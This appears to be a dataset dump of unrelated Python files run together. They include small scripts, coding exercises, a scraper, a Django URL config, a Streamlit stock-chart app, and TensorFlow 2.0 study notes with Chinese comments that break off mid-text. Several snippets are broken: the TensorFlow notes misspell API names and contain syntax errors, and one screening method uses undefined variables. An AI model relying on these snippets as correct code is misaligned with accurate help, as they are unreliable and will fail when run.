text
stringlengths
38
1.54M
import winsound import os import time import sys import turtle as tk os.chdir('C:\\teleport\\Code\\Multi-Snake') def play(): global running running = True while running: winsound.PlaySound("themesong.wav", winsound.SND_ASYNC) time.sleep(7) def stop(): global running running = False sys.exit() import tkinter as tk from turtle import RawTurtle, TurtleScreen, ScrolledCanvas root = tk.Tk() root.attributes("-alpha", 0.3) root.mainloop()
#!/usr/bin/env python import RPi.GPIO as GPIO import ds18b20 import segment import time def setup(): segment.TM1638_init() def destory(): GPIO.cleanup() def loop(): tmp = 0.0 while True: tmp = ds18b20.ds18b20Read() segment.numberDisplay_dec(tmp) time.sleep(0.1) if __name__ == '__main__': setup() try: loop() except KeyboardInterrupt: destory()
""" utility functions to read svn dumps into structured data """ from io import BytesIO import itertools import hashlib key_names = { 'Revision-number': 'revno', 'Node-path': 'path', 'Node-kind': 'kind', 'Node-action': 'action', 'Node-copyfrom-path': 'copy_from', 'Node-copyfrom-rev': 'copy_rev', 'Prop-content-length': 'props_size', 'Content-length': delattr, 'Text-content-length': 'content_size', 'Text-content-md5': delattr, 'Text-content-sha1': 'content_sha1', } def headerkv(text): key, value = text.split(':', 1) value = value.strip() if value.isdigit(): value = int(value) return key, value def read_header(fd): result = {} for key, value in map(headerkv, iter(fd.readline, '\n')): key = key_names.get(key, key) if key is delattr: continue result[key] = value return result def read_props_inner(fd): while True: line = fd.readline().strip() if line == 'PROPS-END': return kind, len = line.split(' ') assert kind == 'K' key = fd.read(int(len)) fd.read(1) # padding newline kind, len = fd.readline().strip().split() assert kind == 'V' value = fd.read(int(len)) fd.read(1) # padding newline yield key, value def read_props(fd, pl): if not pl: return [] raw = fd.read(pl) return read_props_inner(BytesIO(raw)) def read_entry(fd): headers = read_header(fd) props = dict(read_props(fd, headers.get('props_size', 0))) data = fd.read(headers.get('content_size', 0)) if 'content_sha1' in headers: content_hash = hashlib.sha1(data).hexdigest() assert content_hash == headers['content_sha1'] headers.update(props) if data: headers['data'] = data return headers def walk_entries(fd, discard_header=True): if discard_header: read_header(fd) # dump version read_header(fd) # dump uuid while True: try: entry = read_entry(fd) #XXX: why are those empty ones there if entry: yield entry except ValueError: break
#!/bin/python3 import os import sys # # Complete the simpleArraySum function below. # def simpleArraySum(ar): # # Write your code here. if len(ar) != 0: if len(ar) == 1: return ar[0] else: sum = 0 for i in ar: sum += int(i) return sum # if __name__ == '__main__': ar_count = int(input('Enter length of the array: ')) ar = list(map(int, input('Enter the array elements (int), space-seperated: ').rstrip().split())) while len(ar) != ar_count: print('Error. Length of the array does not match the actual number of elements provided.') ar = list(map(int, input('Please re-enter: ').rstrip().split())) result = simpleArraySum(ar) print(result)
''' keys: Solutions: Similar: T: S: ''' from typing import List # https://supercodead.blogspot.com/2019/07/1463-paper-review.html ''' We define that the similarity between two papers is the length of longest similar word subsequence * 2 divided by the total length of two papers. Given two papers, words1, words2 (each represented as an array of strings), and a list of similar pairs of words pairs, find the similarity between the two papers. Note: Similar relationships are transitive. For example, if "great" is similar to "good" and "find" is similar to "good", then "geat" and "find" are similar. Similarity is also symmetrical. For example, "great" is similar to "good" and "good" is similar to "great". In addition, a word is always similar to itself. ''' class Solution: """ @param words1: the words in paper1 @param words2: the words in paper2 @param pairs: the similar words pair @return: the similarity of the two papers """ def getSimilarity(self, words1, words2, pairs):
import os import numpy as np def process(data_path, dest_path, phase): files_list = [] batch_id = 1 for filename in sorted(os.listdir(os.path.join(data_path, phase))): filepath = os.path.join(data_path, phase, filename) all_data = np.load(filepath) features = all_data['data'] # 10 x 100 x 20 x 4096 labels = all_data['labels'] # 10 x 2 detections = all_data['det'] # 10 x 100 x 19 x 6 videos = all_data['ID'] # 10 nid = 1 for i, vid in enumerate(videos): vidname = 'b' + str(batch_id).zfill(3) + '_' + vid.decode('UTF-8') if vidname in files_list: vidname = vidname + '_' + str(nid).zfill(2) nid += 1 feat_file = os.path.join(dest_path, vidname + '.npz') if os.path.exists(feat_file): continue np.savez_compressed(feat_file, data=features[i], labels=labels[i], det=detections[i], ID=vidname) print('batch: %03d, %s file: %s' % (batch_id, phase, vidname)) files_list.append(vidname) batch_id += 1 return files_list def split_dad(data_path, dest_path): # prepare the result paths train_path = os.path.join(dest_path, 'training') if not os.path.exists(train_path): os.makedirs(train_path) test_path = os.path.join(dest_path, 'testing') if not os.path.exists(test_path): os.makedirs(test_path) # process training set train_list = process(data_path, train_path, 'training') print('Training samples: %d'%(len(train_list))) # process testing set test_list = process(data_path, test_path, 'testing') print('Testing samples: %d' % (len(test_list))) if __name__ == '__main__': DAD_PATH = '/data/DAD/features' DEST_PATH = '/data/DAD/features_split' split_dad(DAD_PATH, DEST_PATH)
import sys sys.path.append('lib') from BShipGrid import BShipGrid from PIL import Image, ImageDraw class TheGame(): pass def __init__(self): W = 1000 H = 200 self.img = Image.new("RGBA", (W, H), (0,255,0,0)) self.drawing = ImageDraw.Draw(self.img) a = BShipGrid("Simon") a.markship("A1") a.markship("A2") a.markship("A3") a.markship("C3") a.markship("D3") a.markship("E3") a.markship("F3") a.markship("G3") a.markship("F6") a.markship("E6") a.markship("D6") a.markship("C6") a.markship("H1") a.markship("I1") a.markship("G10") a.markship("H10") a.markship("I10") a.markship("J10") b = BShipGrid("Alyssa") b.markship("J5") b.markship("J4") b.markship("J6") b.markship("J3") b.markship("E9") b.markship("D9") b.markship("C9") b.markship("F9") b.markship("G9") b.markship("B5") b.markship("C5") b.markship("D5") b.markship("E2") b.markship("F2") b.markship("D2") b.markship("B7") b.markship("B8") self.b = b self.a = a def save(self,filename): self.a.draw(self.drawing,10,10, 150, 150) self.b.draw(self.drawing,750,10, 150, 150) #self.img.save("test_draw_small.gif", "gif")#,transparency=0) self.img.save(filename+".png", "PNG",) if __name__ == '__main__': g = TheGame() #shots = ["A3","A4","A5"] shots = [] with open('./data/data.txt') as f: lines = f.read().splitlines() for line in lines: data = line.split("\t") print data shots += data[0:] x = 0 sx = "%02d" % (x,) g.save("shots/"+sx+"-master-start-game") x = 1 t = 0 print "len of shots", len(shots) for shot in shots: t = t+1 print t print shot if shot.find("!") > 0: stype = "HIT" cshot = shot[:-1] elif shot.find("*") > 0: stype = "SINK" cshot = shot[:-1] else: #if t % 2 == 1: print "skipping", shot #name="simon" #cshot=shot #stype="miss" #g.b.markmiss(cshot) continue if t % 2 == 1: name="simon" g.b.markshot(cshot) else: name="alyssa" g.a.markshot(cshot) print cshot sx = "%02d" % (x,) g.save("shots/"+sx+"-master-"+name+"-"+cshot+"-"+stype) x = x+1
import sys from collections import deque input = sys.stdin.readline n, m = map(int, input().split()) board = [list(map(int, input().split())) for _ in range(n)] visited = [[0]*m for _ in range(n)] dr = [1, -1, 0, 0] dc = [0, 0, 1, -1] q = deque() picture_cnt = 0 picture_area = [0] for r in range(n): for c in range(m): if board[r][c] == 1 and visited[r][c] == 0: q.append([r, c]) visited[r][c] = 1 area = 1 while q: now = q.popleft() for k in range(4): nextR = now[0] + dr[k] nextC = now[1] + dc[k] if 0 <= nextR < n and 0 <= nextC < m and board[nextR][nextC] == 1 and visited[nextR][nextC] == 0: visited[nextR][nextC] = 1 q.append([nextR, nextC]) area += 1 picture_area.append(area) picture_cnt += 1 print(picture_cnt) print(max(picture_area))
""" Strategies for changing active set based on current iteration, the current active set and a candidate set of non-zero coefficients. """ import numpy as np import scipy.linalg as la # should we replace this with cython? from numpy.core.umath_tests import inner1d class Strategy: """ Strategy for choosing active set for p variables, given current active set and a candidate active set consisting of all coordinates that were updated in coordinate wise algorithm. Information on the current iteration the algorithm is on may also be used. """ max_greedyit = np.inf max_fitit = 1e4 def __init__(self, p): """ Default strategy is to include all variables in the active set. """ self.p = p def __call__(self, iteration, current, candidate): return self.all() def all(self): """ All variables are active. """ return np.arange(self.p) def SAFE(self, lam_max, lam, y, X): """ Screen variables using the SAFE rule. """ resid_prod = np.fabs( inner1d(X.T,resid) ) idx = resid_prod >= lam - la.norm(X[:,i])*la.norm(y)*((lam_max-lam)/lam_max) return np.where(idx)[0] def STRONG(self, lam_max, lam, resid, X): """ Screen variables using the STRONG rule. """ resid_prod = np.fabs( inner1d(X.T,resid) ) idx = resid_prod >= 2*lam_max - lam return np.where(idx)[0] class NStep(Strategy): __doc__ = Strategy.__doc__ def __init__(self, p, nstep=5): """ Update the active set active set with the candidate if iteration % nstep == 0. """ self.p = p self.nstep = nstep def __call__(self, iteration, current, candidate): if iteration % self.nstep == 0: current = np.asarray(candidate) return np.asarray(current) class NStepBurnin(Strategy): __doc__ = Strategy.__doc__ def __init__(self, p, nstep=5, burnin=1): """ Update the active set with the candidate if it % self.nstep == 0, unless it==self.burnin, in which case also return the candidate. Implicitly assumes that the initial active set is "large", and one update is enough to get a very good idea of the active set. Further iterations, can still drop variables from the active set after every nstep iterations. """ self.p = p self.nstep = nstep self.burnin = burnin if burnin >= nstep: raise ValueError, 'expecting burnin < nstep' def __call__(self, it, current, candidate): if it % self.nstep == 0 or it == self.burnin: current = np.asarray(candidate) return np.asarray(current)
import urllib.request from bs4 import BeautifulSoup from time import sleep import json import hashlib import os from PIL import Image import requests import shutil def download_img(url, file_name): print(url) r = requests.get(url, stream=True) if r.status_code == 200: with open(file_name, 'wb') as f: r.raw.decode_content = True shutil.copyfileobj(r.raw, f) def dwn(url): html = requests.get(url).text soup = BeautifulSoup(html, "html.parser") img = soup.find("img") src = img.get("src") src = os.path.split(url)[0] + "/" + img.get("src") opath = src.replace("http://124.33.215.236/", "../../") if not os.path.exists(opath): tmp = os.path.split(opath) os.makedirs(tmp[0], exist_ok=True) download_img(src, opath) url = "http://124.33.215.236/gazou/index_img_iwasakizenponsasyoku.php" html = urllib.request.urlopen(url) soup = BeautifulSoup(html, "html.parser") aas = soup.find_all("a") urls = [] for a in aas: href = a.get("href") urls.append(href) for url0 in sorted(urls): if "___2009" in url0 or "/2010/" in url0: url1 = "http://124.33.215.236/gazou/"+url0.replace("./", "") print(url1) id = url1.split("TGName=")[1].split("&")[0] try: html = requests.get(url1).text except Exception as e: print(e) continue soup = BeautifulSoup(html, "html.parser") dwn(url1) aas = soup.find_all("a") for a in aas: href = a.get("href") if "_read.php" in href: pp = href.split("?")[0] url = url1.split(pp)[0] + href dwn(url)
import requests def handler(event, context): result = requests.get("https://randomuser.me/api/") return { "data": result.json() }
from django.conf.urls import url from django.contrib import admin from views import todolist, complete, delete urlpatterns = [ #url(r'^$', views.index, name = 'index'), url(r'^admin/', admin.site.urls), url(r'^$', todolist), url(r'^complete/(?P<pk>\d+)/', complete), url(r'^delete/(?P<pk>\d+)/', delete), ]
from bs4 import BeautifulSoup import requests import streamlit as st import pandas as pd import matplotlib.pyplot as plt import numpy as np import datetime from dateutil.relativedelta import * st.set_page_config( page_title="Akcje GPW", page_icon="", #layout="wide", initial_sidebar_state="expanded" ) st.title('Generator wykresów cen akcji notowanych na GPW') #st.markdown(""" ## Generator wykresu ceny wybranej spółki z Giełdy Papierów Wartościowych w Warszawie #Dane pochodzą z portalu stooq.pl #""") InformationContainer = st.empty() @st.cache def PobierzSpolkiGPW(): def getPage(url): page = requests.get(url) soup = BeautifulSoup(page.text, "html.parser") return soup page_iter = 1 Spolki = [] url = "https://stooq.pl/t/?i=523&v=0&l={}" while(1==1): page = getPage(url.format(page_iter)) tabela_z_spolkami = page.find("table", {"id" : "fth1"}).find("tbody") if len(tabela_z_spolkami) <= 0 : break else: for wiersz in tabela_z_spolkami: Spolki.append([wiersz.find(id = "f13").text, wiersz.find(id = "f10").text]) page_iter+=1 return Spolki Spolki = PobierzSpolkiGPW() @st.cache def DownloadPriceData(ChosenCompany): download_data_path = 'https://stooq.pl/q/d/l/?s='+ ChosenCompany + '&i=d' #st.write(download_data_path) Price_Data = requests.get(download_data_path) Price_Data = Price_Data.text.split('\r\n') Price_Data = [wiersz.split(',') for wiersz in Price_Data] cols = Price_Data[0] data = Price_Data[1:] df1 = pd.DataFrame(columns = cols, data = data) df1 = df1.dropna() df1["Zamkniecie"] = pd.to_numeric(df1["Zamkniecie"], downcast="float") df1['Data'] = pd.to_datetime(df1['Data']) #df1.sort_values(by=['Data'], inplace=True, ascending=False) return df1 #add_selectbox = st.sidebar.selectbox( # "Jak oceniasz apkę?", # ("Dobra", "Średnia", "Zła") #) WybranaSpolka_selectbox = st.sidebar.selectbox( "Wybierz spółkę", ["<wybierz>"]+[item[1] + " ("+item[0]+")" for item in Spolki], 0 #index of default element ) @st.cache(allow_output_mutation=True) def button_states(): return {"pressed": None} is_pressed = button_states() # gets our cached dictionary if WybranaSpolka_selectbox != "<wybierz>": WybranaSpolka_KOD = WybranaSpolka_selectbox[ int(WybranaSpolka_selectbox.find("(")+1) : int(WybranaSpolka_selectbox.find(")")) ] InformationContainer = st.success("Wybrana spółka: " + WybranaSpolka_selectbox) #InformationContainer = st.info('Pobieram dane o wybranej spółce...') df1 = DownloadPriceData(WybranaSpolka_KOD) ZakresDat_Filter = st.sidebar.slider( "Wybierz zakres dat", df1["Data"].iloc[-1].date(), df1["Data"].iloc[0].date(), (df1["Data"].iloc[-1].date(), df1["Data"].iloc[0].date()) ) #col1, col2 , col3 , col4, col5, col6, col7= st.sidebar.beta_columns([1,1,1,1,1,1,1]) #button_2t = col2.checkbox("2t") #if(button_2t): # ZakresDat_Filter = st.sidebar.empty() # ZakresDat_Filter = st.sidebar.slider( # "Wybierz zakres dat", # df1["Data"].iloc[-1].date(), # df1["Data"].iloc[0].date(), # (df1["Data"].iloc[-1].date() - relativedelta(weeks=2), df1["Data"].iloc[-1].date()) # ) # # # # #col2.checkbox("1m") #col3.button("6m") #col4.button("1r") #col5.button("2r") #col6.button("5r") #col7.button("all") SredniaRuchoma_Filter = st.sidebar.checkbox("Średnia ruchoma") #SredniaRuchoma_Filter = col1.checkbox("Srednia Ruchoma") SredniaRuchoma_Param1 = st.empty() if (SredniaRuchoma_Filter): SredniaRuchoma_Param1 = st.sidebar.slider(#col2.slider( # 'Opóźnienie', 1, 500, 4 ) if(st.sidebar.button("Generuj Wykres")): mask = (df1["Data"] >= ZakresDat_Filter[0]) & (df1["Data"] <= ZakresDat_Filter[1]) df1 = df1.loc[mask] fig, ax = plt.subplots() ax.plot(df1['Data'], df1['Zamkniecie']) if(SredniaRuchoma_Filter): ax.plot(df1['Data'], df1.Zamkniecie.rolling(window = SredniaRuchoma_Param1 ).mean()) ax.grid = True fig.autofmt_xdate() st.pyplot(fig) else: InformationContainer = st.warning('Wybierz spółkę') with st.beta_expander("TO DO"): st.image("https://www.maccsuso.org.uk/wp-content/uploads/2020/03/things-to-do.png") st.write(""" Filtry na datę. Najlepiej jakieś suwaki fajne z wyłapywaniem błędów typu od > do. Mądre dobieranie dat do wykresu - label i ogólnie nie ma sensu chyba każdej daty prezentować. Zaznaczyć dywidendę. Dodawanie lini trendu, średniej ruchomej do wyłapywania zmian trendu. buttony do zakresu dat sprawić zeby aktualizowaly slider! dodać postawowe wskazniki dla spolki w kontenerze obok PORTFEL zrobic z wykorzystaniem klasy. Osobny kontener do tego. """ , ) #with st.beta_container(): # st.write("This is inside the container") # # # You can call any Streamlit command, including custom components: # st.bar_chart(np.random.randn(50, 3)) #st.write(df1['Data'].head(), df1['Zamkniecie'].head()) #p.line(x = df1['Data'], y = df1['Zamkniecie'], legend='Trend', line_width=2) #fig = plt.plot(df1['Data'], df1['Zamkniecie']) #options = st.multiselect('What are your favorite colors',['Green', 'Yellow', 'Red', 'Blue'],['Yellow', 'Red']) #progress_bar = st.progress(0) #progress_bar.progress(100) #st.dataframe(df1)
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jan 15 10:13:13 2020 TensorFlow2.0 常用函数 tf.keras:构建和训练模型(Sequential模式、函数式API) Eager模式:直接迭代和直观调试 tf.GradientTape:求解梯度,自定义训练模式 tf.data:加载图片与结构化数据 tf.function:自动图运算 @author: liutingting16 """ import pandas as pd import numpy as np import tensorflow as tf import matplotlib.pyplot as plt #%matplotlib inline # !pip install tensorflow==2.0.0-beta1 # !pip install tensorflow-gpu==2.0.0-beta0 #%% tf.keras model = tf.keras.Sequential() model.add(tf.keras.layers.Dense(1, input_shape=(1,))) # 第一个参数是输出维度 model.summary() model.compile(optimizer='adam', loss='mse') model.fit(train_x, train_y, epochs=30) model.predict(text_x) #%% 二分类:logistic model train_x = np.random.rand(100,3) train_y = np.random.randint(0,2,(100,1)) test_x = np.random.rand(100,3) test_y = np.random.randint(0,2,(100,1)) model = tf.keras.Sequential([tf.keras.layers.Dense(10, input_shape=(3,), activation='relu'), #第一层需要定义输入数据的维度:input_shape tf.keras.layers.Dense(5, activation='relu'), tf.keras.layers.Dense(1, activation='sigmoid')]) model.summary() model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc']) #history = model.fit(train_x, train_y, epochs=300) history = model.fit(train_x, train_y, epochs=300, validation_data=(test_x, test_y)) # 在每个epoch上评估测试集准确率 model.predict(test_x) print(history.history.keys()) # losss, acc, val_loss, val_acc plt.plot(history.epoch, history.history.get('loss'), label='loss') plt.plot(history.epoch, history.history.get('val_loss'), label='val_loss') plt.legend() #%% mnist多分类:softmax交叉熵 (train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data() plt.imshow(train_image[0]) train_image = train_image/255.0 # 0-1值 test_image = test_image/255.0 # 0-1值 model = tf.keras.Sequential() model.add(tf.keras.layers.Flatten(input_shape=(28, 28))) # 将张量拉平成同一维度 (28,28) -> 28*28 model.add(tf.keras.layers.Dense(128, activation='relu')) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Dense(10, activation='softmax')) model.summary() model.compile(opitimizer=tf.keras.optimizer.Adam(lr=0.01), loss='sparse_categorical_corssentropy', # 当label为顺序数字编码时 # loss='categorical_corssentropy', # 当label为onehot编码时 metrics=['acc']) history = model.fit(train_image, train_label, epochs=30) model.evaluate(test_image, test_label) # 评估 predict = model.predict(test_image) #预测 print(predict[0]) # 返回预测概率 print(np.argmax(predict[0])) # 返回最大概率的位置 print(test_label[0]) # 真实标签 train_label_hoehot = tf.keras.utils.to_categorial(train_label) # 转化train_label为onehot标签 test_label_hoehot = tf.keras.utils.to_categorial(test_label) # 转化test_label为onehot标签 #%% 函数式API input1 = tf.keras.Input(shape=(28,28)) input2 = tf.keras.Input(shape=(28,28)) x1 = tf.keras.layers.Flatten()(input1) x2 = tf.keras.layers.Flatten()(input2) x = tf.keras.layers.concatenate([x1,x2]) x = tf.keras.layers.Dense(32, activation='relu')(x) x = tf.keras.layers.Dropout(0.2)(x) x = tf.keras.layers.Dense(64, activation='relu')(x) outputs = tf.keras.layers.Dense(10, activation='softmax')(x) model = tf.keras.Model(inputs=[input1, input2], outputs=outputs) # 多输入,单输出 model.summary() model.compile() # 方式同上 #%% tf.data # 创建dataset的几种方式 dataset = tf.data.Dataset.from_tensor_slices([1,2,3,4,5]) dataset = tf.data.Dataset.from_tensor_slices([[1,2],[3,4],[5,6]]) dataset = tf.data.Dataset.from_tensor_slices({'a':[1,2,3,4], 'b':[6,7,8,9], 'c':[12,13,14,15]}) dataset = tf.data.Dataset.from_tensor_slices(np.array([1,2,3,4,5])) for ele in dataset: print(ele) for ele in dataset: print(ele.numpy()) # 转换回numpy数据格式 for ele in dataset.take(4): # 提取topN print(ele.numpy()) # shuffle, repeat, batch的使用 dataset = dataset.shuffle(buffer_size=5, seed=0) # 打乱 dataset = dataset.repeat(count=3) # 重复 dataset = dataset.batch(batch_size=3) for ele in dataset: print(ele.numpy()) # 数据变换:map dataset = tf.data.Dataset.from_tensor_slices([1,2,3,4,5]) dataset = dataset.map(tf.square) print([ele.numpy() for ele in dataset]) # mnist示例 (train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data() train_image = train_image/255.0 # 0-1值 test_image = test_image/255.0 # 0-1值 print(train_image.shape) # (60000, 28, 28) ds_train_img = tf.data.Dataset.from_tensor_slices(train_image) ds_train_lab = tf.data.Dataset.from_tensor_slices(train_label) ds_train = tf.data.Dataset.zip((ds_train_img, ds_train_lab)) #两个tensor的对应位置元素合并,((28,28),()) ds_test = tf.data.Dataset.from_tensor_slices((test_image, test_label)) #同ds_train生成的效果一样,((28,28),()) ds_train = ds_train.shuffle(10000).repeat().batch(64) ds_test = ds_test.batch(64) # 默认使用了repeat() model = tf.keras.Sequential(tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dropout(0.1), tf.keras.layers.Dense(10, activation='softmax')) model.summary() model.compile(opitimizer=tf.keras.optimizer.Adam(lr=0.01), loss='sparse_categorical_corssentropy', # 当label为顺序数字编码时 metrics=['acc']) history = model.fit(ds_train, epochs=5, steps_per_epoch=train_image.shape[0]//64, # "//" used to be int validation_data=ds_test, validation_steps=test_image.shape[0]//64) #%% CNN import keras from keras import layers layers.Conv2D(filters, #卷积核数量(即卷积后的通道数) kernal_size, #卷积核大小 strides=(1,1), #步长为1 padding='valid', # 'same' activation='relu', use_bias=True, kernel_initializer='glorot_uniform', bias_initializer=None, kernel_regularizer=None, #正则化 bias_regularizer=None) layers.MaxPooling2D(pool_size=(2,2), strides=None, padding='valid') # mnist示例 # !pip install -q tensorflow-gpu==2.0.0-alpha0 import tensorflow as tf tf.test.is_gpu_available() (train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data() train_image = np.expand_dims(train_image, -1) # 或reshape(), -1表示扩增的最后一个维度,生成[样本量,长,宽,通道],与上述使用Flatten不同 test_image = np.expand_dims(test_image, -1) model = tf.keras.Sequential() model.add(tf.keras.layers.Conv2D(32, (3,3), input_shape=train_image.shape[1:], #shape[1:]表示除去第一维度,即去除batch的维度,首次需要定义该参数 activation='relu', padding='same')) print(model.output_shape) #(None, 28, 28 ,32) model.add(tf.keras.layers.MaxPooling2D()) # default pooling_size=(2,2), #(None, 14, 14 ,32) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(64, (3,3), activation='relu', padding='same')) #(None, 14, 14 ,64) model.add(tf.keras.layers.MaxPooling2D()) #(None, 7, 7 ,64) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.GlobalAveragePooling2D()) #全局平均池化,或使用Flatten()使其变成1个维度, (None, 64) model.add(tf.keras.layers.Dense(128, activation='relu')) #FFN, (None, 128) model.add(tf.keras.layers.Dense(10, activation='softmax')) #softmax层,(None, 10) model.summary() model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc']) history = model.fit(train_image, train_label, epochs=10, validation_data=(test_image, test_label)) print(history.history.keys()) # losss, acc, val_loss, val_acc plt.plot(history.epoch, history.history.get('acc'), label='acc') plt.plot(history.epoch, history.history.get('val_acc'), label='val_acc') plt.legend() #%% 卫星图像二分类示例(tf.data和CNN) import pathlib import random # 获取图片路径 data_dir = './dateset/2_class' data_root = pathlib.Path(data_dir) for item in data_root.iterdir(): print(item) all_image_path = list(data_root.glob('*/*')) #获取固定正则表达式下的文件路径 all_image_path = [str(x) for x in all_image_path] random.shuffle(all_image_path) image_count = len(all_image_path) #1400 # 获取样本标签 label_names = sorted(item.name for item in data_root.glob('*/')) # ['airplane', 'lake'] label_to_index = dict((name, index) for index, name in enumerate(label_names)) # {'airplane':0, 'lake':1} # pathlib.Path('xx/xx/xxxx.jpg').parent.name # 'lake' all_image_label = [label_to_index[pathlib.Path(p).parent.name] for p in all_image_path] #获取每个样本的标签: 0/1 # 随机显示图像 import Ipython.display as display index_to_label = dict(v,k for k,v in label_to_index.items) # {0:'airplane', 1:'lake'} for n in range(3): image_index = random.choice(range(len(all_image_path))) display.display(display.Image(all_image_path[image_index])) print(index_to_label[all_image_label[image_index]]) # airplane # 使用tensorflow读取图片 def load_preprosess_image(img_path): # img_path = all_image_path[0] img_raw = tf.io.read_file(img_path) #tf读取图片 # img_tensor = tf.image.decode_image(img_raw, channels=3) #图片解码(即转换成的tensor数值矩阵),可以解析多种格式图片,但不能返回解析后的shape img_tensor = tf.image.decode_jpeg(img_raw, channels=3) #针对jpeg格式图像解码 # img_tensor = tf.image.rgb_to_grayscale(img_tensor) #转换成单通道,即input_shape=(256,256,1) # img_tensor = tf.image.resize_image_with_crop_or_pad(img_tensor) #图像resize后不变形 img_tensor = tf.image.resize(img_tensor, (256,256)) #图像可能发生变形,使用resize可以使得解析后的tensor具备shape print(img_tensor.shape) #[256,256,3] print(img_tensor.dtype) #tf.uint8 img_tensor = tf.cast(img_tensor, tf.float32) #转换 tf.uint8 为 tf.float32 img_tensor = img_tensor/255.0 #标准化 # img_tensor = tf.image.per_image_standardization(img_tensor) #与上述类似的标准化 img_numpy = img_tensor.numpy() #tensor转换成numpy print(img_numpy.max(), img_numpy.min()) return img_tensor # 针对解码的tensor,生成图片 plt.imshow(load_preprosess_image(all_image_path[100])) # 使用tf.data构造训练和测试集 path_ds = tf.data.Dataset.from_tensor_slices(all_image_path) image_dataset = path_ds.map(load_preprosess_image) label_dataset = tf.data.Dataset.from_tensor_slices(all_image_label) print(image_dataset.shape) print(label_dataset.shape) for label in label_dataset.take(10): print(label.numpy()) for img in image_dataset.take(2): plt.imshow(img) dataset = tf.data.Dataset.zip((image_dataset, label_dataset)) test_count = int(image_count * 0.2) train_count = image_count - test_count train_dataset = dataset.skip(test_count) test_dataset = dataset.take(test_count) BATCH_SIZE = 32 train_dataset = train_dataset.shuffle(buffer_size=train_count).batch(BATCH_SIZE) test_dataset = test_dataset.batch(BATCH_SIZE) # 构建模型 # conv1-relu-bn-pooling-drop # -conv2-relu-bn-pooling-drop-... # -convn-relu-bn-globalpooling-dense-relu-bn-dense-relu-bn-sigmoid) model = tf.keras.Sequential() model.add(tf.keras.layers.Conv2D(64, (3,3), input_shape=(256,256,3), activation='relu')) # Relu和BN的位置可以互换 model.add(tf.keras.layers.Batchnormalization()) #放在卷基层后 #model.add(tf.keras.layers.Activation('relu')) #也可单独添加激活函数 model.add(tf.keras.layers.MaxPooling2D()) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(128, (3,3), activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.MaxPooling2D()) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(256, (3,3), activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.MaxPooling2D()) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(512, (3,3), activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.MaxPooling2D()) model.add(tf.keras.layers.Dropout(0.1)) model.add(tf.keras.layers.Conv2D(1024, (3,3), activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.GlobalAveragePooling2D()) model.add(tf.keras.layers.Dense(1024, activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.Dense(256, activation='relu')) model.add(tf.keras.layers.Batchnormalization()) model.add(tf.keras.layers.Dense(1, activation='sigmoid')) # 二分类 model.summary() model.compile(optimizer='adam',loss='binary_crossentropy',metrics=['acc']) # 使用二元交叉熵 step_per_epoch = train_count//BATCH_SIZE validation_steps = test_count//BATCH_SIZE history = model.fit(train_dataset, epochs=10, step_per_epoch=step_per_epoch, validation_data=test_dataset, validation_steps=validation_steps) # 准确率评估 print(history.history.keys()) # losss, acc, val_loss, val_acc plt.plot(history.epoch, history.history.get('acc'), label='acc') plt.plot(history.epoch, history.history.get('val_acc'), label='val_acc') plt.legend() #%% 文本向量化 from tensorflow import keras from tensorflow.keras import layers # 电影评论数据 data = keras.datasets.imdb (x_train, y_train), (x_test, y_test) = data.load_data(num_words=10000) #已经将文本转化成ID #d = data.get_word_index() #print(np.mean([len(x) for x in x_train])) # 238 x_train = keras.preprocessing.sequence.pad_sequences(x_train, 300) #填充0,使得长度为300 x_test = keras.preprocessing.sequence.pad_sequences(x_test, 300) #test = 'i am a student ahh' #[d[x] if x in d.keys() else 0 for x in test.split()] #{x:d[x] for x in test.split() if x in d.keys()} # 构建模型 model = keras.models.Sequential() model.add(layers.Embedding(10000, 50, input_length=300)) #向量化,input_length输入数据的长度, (None, 300, 50) model.add(layers.Flatten()) #将输入展平,不影响批量大小,(None, 15000) model.add(layers.Dense(128, activation='relu', kernel_regularizer=keras.regularizers.l2(0.01))) #添加L2正则化 model.add(layers.Dense(1, activation='sigmoid')) model.summary() model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.01), loss='binary_crossentropy', metrics=['acc']) model.fit(x_train, y_train, epochs=10, batch_size=256, validation_data=(x_test, y_test)) #%% Eager模式(命令行式编写环境/tensroflow的交互模式) print(tf.executing_eagerly()) #True # tensor可以与numpy直接运算 a = tf.constant([[1,2],[3,4]]) b = tf.add(a, 1) c = tf.multiply(a, b) num = tf.convert_to_tensor(10) for i in range(num.numpy()): i = tf.constant(i) if int(i % 2) == 0: print(i) d = np.array([[5,6],[7,8]]) print(a + d) print((a + d).numpy()) # 变量 v = tf.Variable(0.0) print(v+1) v.assign(5) #改变变量的值 v.assign_add(1) #变量值加1 v.read_value() #返回变量值 # 梯度运算 w = tf.Variable([[3.0]]) #需要是float数据类型 with tf.GradientTape() as t: loss = w*w + w grad = t.gradient(loss, w) # 求解loss对w的微分 w = tf.constant([[3.0]]) with tf.GradientTape() as t: t.watch(w) # 针对常量w进行跟踪,以便于后续使用t.gradient()求导,Variable不需要watch() loss = w*w + w grad2 = t.gradient(loss, w) w = tf.constant([[3.0]]) with tf.GradientTape(persistent=True) as t: #persistent=True用于多次计算微分 t.watch(w) y = w*w + w z = y*y grad3 = t.gradient(y, w) grad4 = t.gradient(z, w) #%% eager自定义训练模式 - minst示例 ''' 步骤: 1)按Batch准备数据 